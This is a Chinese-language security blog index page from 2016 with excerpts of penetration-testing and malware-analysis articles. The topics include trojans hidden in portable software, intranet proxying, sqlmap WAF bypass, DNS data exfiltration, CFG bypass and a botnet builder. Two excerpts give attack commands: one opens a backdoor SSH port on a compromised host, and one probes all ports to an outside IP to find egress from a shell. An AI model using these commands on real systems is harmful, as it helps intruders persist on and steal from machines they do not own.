绿色.并不代表安全,一个隐藏在绿色软件中的木马分析

绿色.并不代表安全,一个隐藏在绿色软件中的木马分析

病毒木马 2年前 (2016-09-19) 浏览: 117 评论: 0

0x00 背景 “绿色软件”通常指的是那些无需安装即可使用的小软件,这些小软件运行后通常可以直接使用,且使用后不会在注册表、系统目录等残留任何键值和文件,甚至可以直接将其放到U盘、光盘等移动介质中,随时随地使用。同时由于其免安装、解压即可使用,也会给人予安全的感觉,因此深受广大网友的喜爱。然而这些“绿色软件”真的都安全吗? 0x01 木马简介 近期腾讯反病毒实验室捕获到多个带有木马的“绿色软件”压

内网渗透随想

内网渗透随想

渗透注入 2年前 (2016-09-19) 浏览: 169 评论: 0

0x00 前言 之前看到微博有人私信我说内网渗透的技巧,zone也有很多小伙伴问了一些内网渗透的问题,所以我就斗胆写了这篇文章,有不对的,还请各位斧正 整个内网渗透肯定不是一篇两篇文章能够讲述清楚的,所以标题写作随想,想到哪儿写哪儿 0x01 内网代理和转发 *简单区分一下正向代理和反向代理 1.1 正向代理(Forward Proxy) Lhost--》proxy--》Rhost Lhost为了

使用sqlmap中tamper脚本绕过waf

使用sqlmap中tamper脚本绕过waf

渗透注入 2年前 (2016-09-19) 浏览: 101 评论: 0

0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophemask.py 作

使用sqlmapapi.py批量化扫描实践

使用sqlmapapi.py批量化扫描实践

渗透注入 2年前 (2016-09-19) 浏览: 74 评论: 0

0x00 前言 sqlmap可谓是sql注入探测的神器,优秀的探测功能可以让任何一个使用者无基础挖掘sql注入。wooyun上关于sqlmap的文章已经有6篇了,都没有科 普sqlmapapi.py。因此我打算分享下这方面的实践。利用sqlmap测试SQL注入的效率很低,每一个url都需要手动测试,这样肯定不是理想状态。 sqlmap的作者肯定也察觉到这一点了,默默的开发了sqlmapapi.py

也谈链路劫持

也谈链路劫持

固若金汤 2年前 (2016-09-19) 浏览: 106 评论: 0

0x00 前言 最近在处理了一些HTTP劫持的案例和拜读业内不少大牛的文章之后,觉得有必要把最近的一些关于劫持案例的分析和思考记录下来,以留作日后备忘。 首先是一例典型的旁路劫持案例: 劫持者应该是利用在运营商内部的便利条件,在网关路由器上添加嗅探程序,嗅探明文HTTP请求数据包,拿到要劫持的数据包之后,马上给请求者返回HTTP response(302 到其他 url),并且立即关闭当前HTTP

渗透技巧之SSH篇

渗透技巧之SSH篇

渗透注入 2年前 (2016-09-16) 浏览: 191 评论: 0

原文地址:http://drops.wooyun.org/tips/1951 用些小技巧,蒙蒙菜鸟管理员。 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 <code>#!bash mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; </code>

云、管、端三重失守,大范围挂马攻击分析

云、管、端三重失守,大范围挂马攻击分析

病毒木马 2年前 (2016-09-16) 浏览: 87 评论: 0

0x00 源起 从3月5日开始,腾讯反病毒实验室监控到大量知名软件客户端存在释放下载器病毒的异常数据,预示着可能存在通过挂马方式大规模攻击知名软件客户端的行为。电脑管家紧急对相关数据进行分析排查,最终发现这是一起综合利用运营商监控缺失、网络广告商审核不严、客户端软件存在安全漏洞等多重因素进行的大规模网络攻击,其攻击方式就多达3种(参见下图)。 0x01 分析过程 1. 攻击方式一(某运营商客户端)

有米iOS恶意SDK分析

有米iOS恶意SDK分析

漏洞播报 2年前 (2016-09-16) 浏览: 116 评论: 0

0x00 前言 有米广告平台为业界领先的移动信息服务提供商优蜜科技™所有,总部和研发中心设在广州,在北京设立分支机构。有米广告拥有核心技术及完整知识产权,并获多项国家专利,在用户特征识别、精准投放、客户端防作弊、广告智能投放等关键领域遥遥领先。有米广告瞄准7亿手机用户,致力于为数以万计的企业广告主提供精准的产品营销和品牌推广服务,为应用开发者创造公正和优质的广告收益。 网址是 https://ww

由Ghost漏洞引发的“血案”

由Ghost漏洞引发的“血案”

漏洞播报 2年前 (2016-09-16) 浏览: 110 评论: 0

0x00 背景 最近某安全公司发现的glibc gethostbyname buffer overflow漏洞,该漏洞被命名为ghost,其原因是glibc的Gethostbyname函数在处理传入的畸形域名信息作解析时导致堆溢出,众多网络应用依赖glibc模块的将受到影响,现已经确认受影响的版本是glibc 2.2<=version<=2.17,但是在我们的安全研究人员在测试时触发了

远程备份数据库和文件的方法

远程备份数据库和文件的方法

固若金汤 2年前 (2016-09-14) 浏览: 76 评论: 0

Windows 1.判断什么端口能出来 有时候有防火墙,你也不知道哪个端口能出来,你只有SHELL,咋判断什么端口能出来呢?如果你是在WIN VISTA以下版本,那么用下面的命令可以啦 FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i") 用TELNET不停的连接你的1-65535端口,你本地开个TC

运维安全概述

运维安全概述

渗透注入 2年前 (2016-09-13) 浏览: 114 评论: 0

0x00 前言 运维安全是企业安全保障的基石,不同于Web安全、移动安全或者业务安全,运维安全环节出现问题往往会比较严重。 一方面,运维出现的安全漏洞自身危害比较严重。运维服务位于底层,涉及到服务器,网络设备,基础应用等,一旦出现安全问题,直接影响到服务器的安全;另一方面,一个运维漏洞的出现,通常反映了一个企业的安全规范、流程或者是这些规范、流程的执行出现了问题,这种情况下,可能很多服务器都存在这

云服务器安全设计

云服务器安全设计

固若金汤 2年前 (2016-09-13) 浏览: 107 评论: 0

0x00 产品定位 目前越来越多的初创企业把自己的业务系统架设在公有云上,包含:阿里云、Ucloud、青云、华为云和AWS。在云上的安全怎么保证,是目前摆在我们面前的最大问题,因为,互联网公司业务系统在不断迭代,迭代周期最少的有3天,而且架构也不断在改变。在这种频繁改变的过程中,云安全应该怎么保证?,云主机安全服务平台(Cloud security as a service),为多租户提供云主机安

运维安全之NFS安全

运维安全之NFS安全

黑客攻击 2年前 (2016-09-12) 浏览: 116 评论: 0

说起NFS是(Network File System)的缩写,相信这很多人都知道。其最大的优点就是可以在网络里使不同的主机,不同的操作系统来互相分享文件。由于NFS不像WEB那样经常使用,一般也就用到的时候去网上随便找篇文档安装一下,剩下的就是能用就行了。所以安全性往往是比较容易忽略的问题。 NFS的联动进程有nfsd,rpc.mountd,rpc.statd, locked,rpc.idmapd

再利用Chakra引擎绕过CFG

再利用Chakra引擎绕过CFG

渗透注入 2年前 (2016-09-12) 浏览: 66 评论: 0

0x00 前言 本文源自一次与TK闲聊,期间得知成功绕过CFG的经过与细节(参考:[利用Chakra JIT绕过DEP和CFG])。随即出于对技术的兴趣,也抽出一些时间看了相关的东西,结果发现了另一处绕过CFG的位置。所以这篇文章中提到的思路与技术归根结底是来自TK提示的,在此特别感谢。 关于CFG的分析文章已经有很多了,想要了解的话可以参考我之前在HitCon 2015上的演讲(spartan

异常中的异常——借助系统异常处理特例实现匪夷所思的漏洞利用

异常中的异常——借助系统异常处理特例实现匪夷所思的漏洞利用

漏洞播报 2年前 (2016-09-08) 浏览: 75 评论: 0

0x00 简介 内存的读、写、执行属性是系统安全最重要的机制之一。通常,如果要改写内存中的数据,必须先确保这块内存具有可写属性,如果要执行一块内存中的代码,必须先确保这块内存具有可执行属性,否则就会引发异常。然而,Windows系统的异常处理流程中存在一些小小的特例,借助这些特例,就可以知其不可写而写,知其不可执行而执行。 0x01 直接改写只读内存 我在CanSecWest 2014的演讲《RO

揭秘Neutrino僵尸网络生成器

揭秘Neutrino僵尸网络生成器

病毒木马 2年前 (2016-09-06) 浏览: 225 评论: 0

0x01 引言 一般情况下,网络犯罪分子通常都会以产品套装的形式来出售其攻击软件,其中包括: 恶意有效载荷:恶意软件的前端,用于感染用户。 C&C面板:恶意软件的后端部分,通常为LAMP环境下的一个Web应用程序。 生成器:一个应用程序,用来打包有效载荷,并嵌入特定发布者所感兴趣的信息,比如C&C地址、配置信息等。 这些恶意软件套装通常都是在黑市上销售的,尽管如此,有时还是会流入主

在Flash中利用PCRE正则式漏洞CVE的方法

在Flash中利用PCRE正则式漏洞CVE的方法

漏洞播报 2年前 (2016-09-06) 浏览: 104 评论: 0

0x00 前言 issue 199/PSIRT-3161/CVE-2015-0318 简要概述:Flash使用的PCRE正则式解析引擎(https://github.com/adobe-flash/avmplus/tree/master/pcre, 请注意公开的avmplus代码早已过期,他之前有的许多其他漏洞已经被Adobe修复,所以审计这段代码可能会比较让人灰心)。 注:明显这个引擎是有漏洞的

在SQL注入中使用DNS获取数据

在SQL注入中使用DNS获取数据

渗透注入 2年前 (2016-09-06) 浏览: 348 评论: 0

0x00 前言 原文地址: http://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf 原文作者: Miroslav Štampar 本文描述了一种利用DNS解析过程获取恶意SQL查询结果的先进的SQL注入技术。带有sql查询结果的DNS请求最终被攻击者控制的远程域名服务器拦截并提取出宝贵的数据。 开源SQL注入工具—SqlMap现在已经可以自动完成这

在不需要知道密码的情况下 Hacking MSSQL

在不需要知道密码的情况下 Hacking MSSQL

黑客攻击 2年前 (2016-09-02) 浏览: 90 评论: 0

0x01 前言 在最近的一次渗透测试中,我抓包的时候无意中注意到一些没被加密的 MSSQL 流量。因为语法摆在那里,不会弄错。最开始我以为这是一个可以抓到认证凭证的方法,然而,MSSQL 加密了登录流量,这意味着我不得不去破解它的加密算法来获得凭证。如果安装 MSSQL 的时候用了一个自签发证书,那么很简单的就可以破解了。 不过不幸的事,破解 MSSQL 加密并不在和这个客户签订的协议的范围中。所

切换注册

登录

忘记密码 ?

切换登录

注册

扫一扫二维码分享